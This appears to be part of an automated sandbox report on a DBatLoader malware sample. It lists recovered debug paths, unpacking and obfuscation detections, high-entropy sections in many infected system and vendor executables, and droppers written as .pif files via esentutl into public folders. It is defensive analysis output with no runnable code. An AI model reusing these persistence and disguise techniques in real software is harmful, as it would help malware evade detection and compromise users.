Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 00000010.00000003.2983037268.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 00000010.00000003.2984642643.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: wdmvmswJ.pif, 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1555508277.0000000002932000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B3F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B10000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478142210.0000000002931000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdb source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 00000010.00000003.2980211327.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 00000010.00000003.2977864019.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2227816265.000000001E790000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: wdmvmswJ.pif, 0000000C.00000003.2209705208.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 00000010.00000003.2985347717.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 00000010.00000003.2987868731.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 00000010.00000003.2981785083.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 00000010.00000003.2983037268.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdb source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 00000010.00000003.2980968904.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 00000010.00000003.2984642643.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 00000010.00000003.2981785083.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 00000010.00000003.2980968904.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Unpacked PE file: 30.2.wdmvmswJ.pif.400000.3.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:EW;
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Unpacked PE file: 38.2.wdmvmswJ.pif.400000.5.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:EW;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Unpacked PE file: 30.2.wdmvmswJ.pif.400000.3.unpack
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Unpacked PE file: 38.2.wdmvmswJ.pif.400000.5.unpack

Yara detected DBatLoader

Source: Yara match

File source: 4.2.x.exe.2af0000.0.unpack, type: UNPACKEDPE

Binary contains a suspicious time stamp

Source: wdmvmswJ.pif.4.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B0894C LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02B0894C

PE file contains sections with non-standard names

Source: alpha.pif.8.dr	Static PE information: section name: .didat
Source: Acrobat.exe.12.dr	Static PE information: section name: .didat
Source: setup.exe.12.dr	Static PE information: section name: .didat
Source: setup.exe.12.dr	Static PE information: section name: _RDATA
Source: updater.exe.12.dr	Static PE information: section name: .00cfg
Source: updater.exe.12.dr	Static PE information: section name: .voltbl
Source: updater.exe.12.dr	Static PE information: section name: _RDATA
Source: IntegratedOffice.exe.12.dr	Static PE information: section name: .didat
Source: IntegratedOffice.exe.12.dr	Static PE information: section name: _RDATA
Source: OfficeC2RClient.exe.12.dr	Static PE information: section name: .didat
Source: OfficeC2RClient.exe.12.dr	Static PE information: section name: .detourc
Source: officesvcmgr.exe.12.dr	Static PE information: section name: .didat
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: section name: .00cfg
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: section name: .gxfg
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: section name: .retplne
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: section name: LZMADEC
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: section name: _RDATA
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: section name: malloc_h
Source: chrmstp.exe.12.dr	Static PE information: section name: .00cfg
Source: chrmstp.exe.12.dr	Static PE information: section name: .gxfg
Source: chrmstp.exe.12.dr	Static PE information: section name: .retplne
Source: chrmstp.exe.12.dr	Static PE information: section name: CPADinfo
Source: chrmstp.exe.12.dr	Static PE information: section name: LZMADEC
Source: chrmstp.exe.12.dr	Static PE information: section name: _RDATA
Source: chrmstp.exe.12.dr	Static PE information: section name: malloc_h
Source: setup.exe0.12.dr	Static PE information: section name: .00cfg
Source: setup.exe0.12.dr	Static PE information: section name: .gxfg
Source: setup.exe0.12.dr	Static PE information: section name: .retplne
Source: setup.exe0.12.dr	Static PE information: section name: CPADinfo
Source: setup.exe0.12.dr	Static PE information: section name: LZMADEC
Source: setup.exe0.12.dr	Static PE information: section name: _RDATA
Source: setup.exe0.12.dr	Static PE information: section name: malloc_h
Source: armsvc.exe.12.dr	Static PE information: section name: .didat
Source: alg.exe.12.dr	Static PE information: section name: .didat
Source: GoogleCrashHandler64.exe.12.dr	Static PE information: section name: _RDATA
Source: GoogleCrashHandler64.exe.12.dr	Static PE information: section name: .gxfg
Source: GoogleCrashHandler64.exe.12.dr	Static PE information: section name: .gehcont
Source: FXSSVC.exe.12.dr	Static PE information: section name: .didat
Source: elevation_service.exe.12.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe.12.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe.12.dr	Static PE information: section name: .retplne
Source: elevation_service.exe.12.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.12.dr	Static PE information: section name: malloc_h
Source: elevation_service.exe0.12.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe0.12.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe0.12.dr	Static PE information: section name: .retplne
Source: elevation_service.exe0.12.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.12.dr	Static PE information: section name: malloc_h
Source: maintenanceservice.exe.12.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe.12.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.12.dr	Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.12.dr	Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.12.dr	Static PE information: section name: .gxfg
Source: GoogleUpdateComRegisterShell64.exe.12.dr	Static PE information: section name: .gehcont
Source: 117.0.5938.132_chrome_installer.exe.12.dr	Static PE information: section name: .00cfg
Source: 117.0.5938.132_chrome_installer.exe.12.dr	Static PE information: section name: .retplne
Source: msdtc.exe.12.dr	Static PE information: section name: .didat
Source: msiexec.exe.12.dr	Static PE information: section name: .didat
Source: MsSense.exe.12.dr	Static PE information: section name: .didat
Source: Spectrum.exe.12.dr	Static PE information: section name: .didat
Source: TieringEngineService.exe.12.dr	Static PE information: section name: .didat
Source: unpack200.exe.12.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.12.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.12.dr	Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.12.dr	Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.12.dr	Static PE information: section name: _RDATA
Source: cookie_exporter.exe.12.dr	Static PE information: section name: .00cfg
Source: cookie_exporter.exe.12.dr	Static PE information: section name: .gxfg
Source: cookie_exporter.exe.12.dr	Static PE information: section name: .retplne
Source: cookie_exporter.exe.12.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.12.dr	Static PE information: section name: .00cfg
Source: identity_helper.exe.12.dr	Static PE information: section name: .gxfg
Source: identity_helper.exe.12.dr	Static PE information: section name: .retplne
Source: identity_helper.exe.12.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.12.dr	Static PE information: section name: malloc_h
Source: setup.exe1.12.dr	Static PE information: section name: .00cfg
Source: setup.exe1.12.dr	Static PE information: section name: .gxfg
Source: setup.exe1.12.dr	Static PE information: section name: .retplne
Source: setup.exe1.12.dr	Static PE information: section name: LZMADEC
Source: setup.exe1.12.dr	Static PE information: section name: _RDATA
Source: setup.exe1.12.dr	Static PE information: section name: malloc_h
Source: msedgewebview2.exe.12.dr	Static PE information: section name: .00cfg
Source: msedgewebview2.exe.12.dr	Static PE information: section name: .gxfg
Source: msedgewebview2.exe.12.dr	Static PE information: section name: .retplne
Source: msedgewebview2.exe.12.dr	Static PE information: section name: CPADinfo
Source: msedgewebview2.exe.12.dr	Static PE information: section name: LZMADEC
Source: msedgewebview2.exe.12.dr	Static PE information: section name: _RDATA
Source: msedgewebview2.exe.12.dr	Static PE information: section name: malloc_h
Source: vds.exe.12.dr	Static PE information: section name: .didat
Source: VSSVC.exe.12.dr	Static PE information: section name: .didat
Source: WmiApSrv.exe.12.dr	Static PE information: section name: .didat
Source: wmpnetwk.exe.12.dr	Static PE information: section name: .didat
Source: SearchIndexer.exe.12.dr	Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1D2FC push 02B1D367h; ret	4_2_02B1D35F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AF63AE push 02AF640Bh; ret	4_2_02AF6403
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AF63B0 push 02AF640Bh; ret	4_2_02AF6403
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AF332C push eax; ret	4_2_02AF3368
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1C378 push 02B1C56Eh; ret	4_2_02B1C566
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AFC349 push 8B02AFC1h; ret	4_2_02AFC34E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1D0AC push 02B1D125h; ret	4_2_02B1D11D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0306B push 02B030B9h; ret	4_2_02B030B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0306C push 02B030B9h; ret	4_2_02B030B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1D1F8 push 02B1D288h; ret	4_2_02B1D280
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0F108 push ecx; mov dword ptr [esp], edx	4_2_02B0F10D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1D144 push 02B1D1ECh; ret	4_2_02B1D1E4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AF6784 push 02AF67C6h; ret	4_2_02AF67BE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AF6782 push 02AF67C6h; ret	4_2_02AF67BE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AFD5A0 push 02AFD5CCh; ret	4_2_02AFD5C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1C570 push 02B1C56Eh; ret	4_2_02B1C566
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AFC56C push ecx; mov dword ptr [esp], edx	4_2_02AFC571
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0AAE0 push 02B0AB18h; ret	4_2_02B0AB10
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B08AD8 push 02B08B10h; ret	4_2_02B08B08
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0AADF push 02B0AB18h; ret	4_2_02B0AB10
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B64A50 push eax; ret	4_2_02B64B20
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AFCBEC push 02AFCD72h; ret	4_2_02AFCD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0886C push 02B088AEh; ret	4_2_02B088A6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AFC98E push 02AFCD72h; ret	4_2_02AFCD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AFC9DE push 02AFCD72h; ret	4_2_02AFCD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0790C push 02B07989h; ret	4_2_02B07981
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B06946 push 02B069F3h; ret	4_2_02B069EB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B06948 push 02B069F3h; ret	4_2_02B069EB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B05E7C push ecx; mov dword ptr [esp], edx	4_2_02B05E7E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B02F60 push 02B02FD6h; ret	4_2_02B02FCE
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_0041C40C push cs; iretd	12_1_0041C4E2

Source: Acrobat.exe.12.dr	Static PE information: section name: .reloc entropy: 7.857629901541196
Source: setup.exe.12.dr	Static PE information: section name: .rsrc entropy: 7.644733541214545
Source: Aut2exe.exe.12.dr	Static PE information: section name: .rsrc entropy: 7.800655098270515
Source: Aut2exe_x64.exe.12.dr	Static PE information: section name: .rsrc entropy: 7.800507924806883
Source: AutoIt3_x64.exe.12.dr	Static PE information: section name: .reloc entropy: 7.943934980231315
Source: appvcleaner.exe.12.dr	Static PE information: section name: .reloc entropy: 7.935643965778136
Source: SciTE.exe.12.dr	Static PE information: section name: .reloc entropy: 7.9123163296469805
Source: IntegratedOffice.exe.12.dr	Static PE information: section name: .reloc entropy: 7.926768905035472
Source: OfficeC2RClient.exe.12.dr	Static PE information: section name: .reloc entropy: 7.716531028347558
Source: officesvcmgr.exe.12.dr	Static PE information: section name: .reloc entropy: 7.937221399929087
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: section name: .reloc entropy: 7.940586616723075
Source: chrmstp.exe.12.dr	Static PE information: section name: .reloc entropy: 7.941023886348422
Source: setup.exe0.12.dr	Static PE information: section name: .reloc entropy: 7.941032370435357
Source: AppVClient.exe.12.dr	Static PE information: section name: .reloc entropy: 7.936523067479569
Source: jucheck.exe.12.dr	Static PE information: section name: .reloc entropy: 7.931078087310504
Source: jusched.exe.12.dr	Static PE information: section name: .reloc entropy: 7.936052797736743
Source: FXSSVC.exe.12.dr	Static PE information: section name: .reloc entropy: 7.942279833740998
Source: elevation_service.exe.12.dr	Static PE information: section name: .reloc entropy: 7.943952204055294
Source: elevation_service.exe0.12.dr	Static PE information: section name: .reloc entropy: 7.945964485826929
Source: 117.0.5938.132_chrome_installer.exe.12.dr	Static PE information: section name: .reloc entropy: 7.93477484000238
Source: SensorDataService.exe.12.dr	Static PE information: section name: .reloc entropy: 7.935383609926094
Source: Spectrum.exe.12.dr	Static PE information: section name: .reloc entropy: 7.945453569107587
Source: identity_helper.exe.12.dr	Static PE information: section name: .reloc entropy: 7.940737618189385
Source: setup.exe1.12.dr	Static PE information: section name: .reloc entropy: 7.944730680089531
Source: msedgewebview2.exe.12.dr	Static PE information: section name: .reloc entropy: 7.93656284710181
Source: AgentService.exe.12.dr	Static PE information: section name: .reloc entropy: 7.937129466044474
Source: vds.exe.12.dr	Static PE information: section name: .reloc entropy: 7.94107270673957
Source: VSSVC.exe.12.dr	Static PE information: section name: .reloc entropy: 7.93954260709988
Source: wbengine.exe.12.dr	Static PE information: section name: .reloc entropy: 7.941290670440269
Source: wmpnetwk.exe.12.dr	Static PE information: section name: .reloc entropy: 7.946616363744485
Source: SearchIndexer.exe.12.dr	Static PE information: section name: .reloc entropy: 7.945863668494267

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\b2310dff430b0ac5.bin

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\wdmvmswJ.pif	Jump to dropped file

Drops executable to a common third party application directory

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
